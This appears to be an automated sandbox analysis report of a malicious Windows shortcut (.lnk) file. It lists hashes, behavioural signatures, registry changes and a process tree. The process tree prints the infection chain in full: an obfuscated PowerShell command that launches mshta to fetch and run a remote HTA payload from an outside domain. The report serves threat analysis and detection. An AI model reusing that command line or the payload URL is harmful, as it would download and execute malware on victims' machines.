Analysis
-
max time kernel
137s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
23-05-2024 02:13
Static task
static1
Behavioral task
behavioral1
Sample
eddc294fc8599c7fccde15ac5516eb8fdab161aafe83e15a21dab41c98781765.lnk
Resource
win7-20240221-en
General
-
Target
eddc294fc8599c7fccde15ac5516eb8fdab161aafe83e15a21dab41c98781765.lnk
-
Size
1KB
-
MD5
27251cc401cfe955c65b5512b5684f8b
-
SHA1
80c817b04ae8a395d8f078bbf4e117895c13e6bd
-
SHA256
eddc294fc8599c7fccde15ac5516eb8fdab161aafe83e15a21dab41c98781765
-
SHA512
c1ab81ca147a45d1d60008d3b1edb610552ebd60202a0f791352a139512fdae276b916c438254b48d72105ae061d98346f55c3c92866aa45c28483ca37f1717b
Malware Config
Extracted
https://foundationforwomenshealth.com/swim.hta
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
mshta.exeflow pid process 9 2152 mshta.exe 12 2152 mshta.exe 15 2152 mshta.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation cmd.exe -
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{1D609180-18AA-11EF-9519-62BC6A84A035} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4055929879" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "423195413" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "4055929879" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31108278" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4061711362" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31108278" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31108278" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 8 powershell.exe 8 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 8 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 4352 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEpid process 4352 iexplore.exe 4352 iexplore.exe 3244 IEXPLORE.EXE 3244 IEXPLORE.EXE 4524 IEXPLORE.EXE 4524 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
cmd.exepowershell.exeiexplore.exedescription pid process target process PID 4376 wrote to memory of 8 4376 cmd.exe powershell.exe PID 4376 wrote to memory of 8 4376 cmd.exe powershell.exe PID 8 wrote to memory of 2152 8 powershell.exe mshta.exe PID 8 wrote to memory of 2152 8 powershell.exe mshta.exe PID 4352 wrote to memory of 3244 4352 iexplore.exe IEXPLORE.EXE PID 4352 wrote to memory of 3244 4352 iexplore.exe IEXPLORE.EXE PID 4352 wrote to memory of 3244 4352 iexplore.exe IEXPLORE.EXE PID 4352 wrote to memory of 4524 4352 iexplore.exe IEXPLORE.EXE PID 4352 wrote to memory of 4524 4352 iexplore.exe IEXPLORE.EXE PID 4352 wrote to memory of 4524 4352 iexplore.exe IEXPLORE.EXE
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\eddc294fc8599c7fccde15ac5516eb8fdab161aafe83e15a21dab41c98781765.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'https://foundationforwomenshealth.com/swim.hta'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://foundationforwomenshealth.com/swim.hta3⤵
- Blocklisted process makes network request
- Checks whether UAC is enabled
-
C:\Program Files (x86)\Internet Explorer\ielowutil.exe"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding1⤵
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4352 CREDAT:17410 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4352 CREDAT:82946 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\706CA7D6DBAE891CDEA570A00B8F615AFilesize
503B
MD54ca3c20cf0350948d78034ae05f7214a
SHA17e22661b0cfff067f0214fd592146dd7e235e6af
SHA256310d57e27b68292969aad3acad17d241e9f6dd7d0d289cea4d501dc73a0309f7
SHA5123d3a5534bc16b1796a4b9656369b0511283501d3474f7ede8b1249f7064ba10f012f6143b1d51776c54abb83a1a09c6b0cd1c0be4f6e1a1a3f51d251cf9c52f8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776Filesize
471B
MD501409a92b179c99711ea8c28d307d0c4
SHA1a9cc2b0c5727e2af14819f3908c4693f8e891392
SHA2563034962a4c308ef5e66a2de7faf1ed2439b7e59086a8c07ad59ce3669b8ee01c
SHA5128e86173a54d253f3e05443c603222b9018d63a3fb8e3a26b2b5602c083c07b117d5c53ede08056b6aa4503380562444c6704de32b2cce76f146478616b7278c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751Filesize
192B
MD5d6e19eae69b45d6abe5fbc7b6f6bf228
SHA1478d9c791a59e90ffd2e9cfb9c147b778ba6201e
SHA256f9f6c356c6b81243a68ba680f23fc44eb66f21eb3472d06f47324a75d712350b
SHA5125ce8ca6e156a19addafb5173672912fb28aa177008c04a61a9620bdaf2d132fbee2a04723d59c8e47d8e4baf7b2c68ec4345d1acb34aca79db916796e774634a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\706CA7D6DBAE891CDEA570A00B8F615AFilesize
552B
MD5af1f42bf68eb66ff0d7afbb218ff8e9f
SHA16671d9d62fe422a8dac478cafe8671b249906ea7
SHA256d2b6bb30d6ce063bfde8953944f8d14e9643f9b2305307a746d99ff27515325c
SHA512b2aae34dcb3f5eaeee39f67bbb833eb3e37d8e4173c5989578cc67ce7d7ab11693464d61bfe6cbc4105885b7915a33757efb046a9923273cb9e4a3d8ec310330
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776Filesize
404B
MD519c3bd6b27dc6dcf11dabdcd3ca93104
SHA1e7041106522d5845f96323ab6badf1abde20ab62
SHA2561682efd8fa30a1e2ca0313223900db2a83f7a9d1441a70e61298580e80274761
SHA5129b3214d988b6a1ed871af7d1473fa66cf73eda0705e3d544f4ddbf58be4fe31b652b4147f8462ddaf4fad5a12419fa8e1c4228f4a1ca4380bfac26164f9f7d70
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\2IX84YPE\suggestions[1].en-USFilesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0gdazehi.vph.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/8-17-0x00007FF917AA0000-0x00007FF918561000-memory.dmpFilesize
10.8MB
-
memory/8-16-0x00007FF917AA0000-0x00007FF918561000-memory.dmpFilesize
10.8MB
-
memory/8-13-0x00007FF917AA0000-0x00007FF918561000-memory.dmpFilesize
10.8MB
-
memory/8-12-0x000001F423D60000-0x000001F423D82000-memory.dmpFilesize
136KB
-
memory/8-2-0x00007FF917AA3000-0x00007FF917AA5000-memory.dmpFilesize
8KB